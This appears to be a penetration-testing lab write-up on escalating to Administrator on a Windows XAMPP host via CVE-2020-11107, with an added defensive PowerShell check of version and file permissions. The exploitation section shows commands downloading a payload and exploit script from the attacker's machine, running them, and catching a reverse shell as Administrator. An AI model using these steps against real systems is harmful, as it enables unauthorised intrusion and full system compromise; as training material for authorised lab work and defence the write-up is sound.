CVE-2020-11107


The target XAMPP instance is likely vulnerable to CVE-2020-11107 because of its outdated version, 7.3.10.

A vulnerability was found in XAMPP up to 7.2.28/7.3.15/7.4.3 on Windows and classified as critical. Affected by this issue is some unknown functionality of the file xampp-control.ini. Manipulation of this file leads to improper privilege management. This vulnerability is tracked as CVE-2020-11107. Local access is required to attack it. Furthermore, there is a public exploit available. It is recommended to upgrade the affected component.
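From a defender's side, the two facts above (the affected version ranges and the file whose manipulation matters) translate directly into a host check. The PowerShell below is an added example, not part of the original writeup or of XAMPP; it assumes the default install path C:\xampp and takes the version string reported on the target (7.3.10) as input.

```powershell
# Added example (not part of the original writeup): checks whether a XAMPP
# install falls in the version ranges the advisory lists as affected and
# whether non-privileged principals can modify xampp-control.ini.
# Assumptions: default install path C:\xampp; version string supplied by the caller.
$XamppVersion = '7.3.10'                      # version reported on the target in this writeup
$IniPath = 'C:\xampp\xampp-control.ini'       # assumed default install location

function Test-XamppVersionAffected {
    param([Parameter(Mandatory)][string]$Version)
    # Last affected release per branch, as stated for CVE-2020-11107
    $lastAffected = @{ '7.2' = [version]'7.2.28'; '7.3' = [version]'7.3.15'; '7.4' = [version]'7.4.3' }
    $v = [version]$Version
    $branch = "$($v.Major).$($v.Minor)"
    if ($lastAffected.ContainsKey($branch)) { return ($v -le $lastAffected[$branch]) }
    # Assumption: branches older than 7.2 predate the fixed releases; newer branches carry the fix
    return ($v -lt [version]'7.2.0')
}

function Get-BroadWriteAccess {
    param([Parameter(Mandatory)][string]$Path)
    # Principals that should not be able to modify a config file consumed by a privileged process
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $broad -contains $_.IdentityReference.Value -and
        (($_.FileSystemRights -band $writeMask) -ne 0)
    }
}

if (Test-XamppVersionAffected -Version $XamppVersion) {
    Write-Output "XAMPP $XamppVersion is within the affected range for CVE-2020-11107; upgrade it."
} else {
    Write-Output "XAMPP $XamppVersion is outside the affected range."
}

if (Test-Path -Path $IniPath) {
    $hits = Get-BroadWriteAccess -Path $IniPath
    if ($hits) {
        Write-Output "Broad write access on ${IniPath}:"
        $hits | ForEach-Object { Write-Output ("  {0}: {1}" -f $_.IdentityReference, $_.FileSystemRights) }
    } else {
        Write-Output "No broad write access on $IniPath."
    }
} else {
    Write-Output "$IniPath not found (non-default install path?)."
}
```

Any Allow entry it lists for a broad group is the condition to remediate, independently of the version check: tighten the ACL so only administrators can write the file, and upgrade XAMPP past the listed releases.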

Exploit


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ searchsploit -m windows/local/50337.ps1 ; mv 50337.ps1 CVE-2020-11107.ps1
  Exploit: XAMPP 7.4.3 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/50337
     Path: /usr/share/exploitdb/exploits/windows/local/50337.ps1
    Codes: CVE-2020-11107
 Verified: False
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/monster/50337.ps1

Exploit locally available

Modifications


Modifying the PowerShell script to include the payload

Exploitation


PS C:\tmp> iwr -Uri http://192.168.45.249/pe.exe -OutFile .\pe.exe
PS C:\tmp> iwr -Uri http://192.168.45.249/CVE-2020-11107.ps1 -OutFile .\CVE-2020-11107.ps1

Delivery complete

PS C:\tmp> .\CVE-2020-11107.ps1

Executing

Value has changed

PS C:\tmp> Restart-Computer

The mike user is able to restart the machine.

Restarting

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.156.180] 49672
Windows PowerShell running as user Administrator on MIKE-PC
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\WINDOWS\system32> whoami
mike-pc\administrator
PS C:\WINDOWS\system32> hostname
Mike-PC
PS C:\WINDOWS\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.156.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.156.254

System level compromise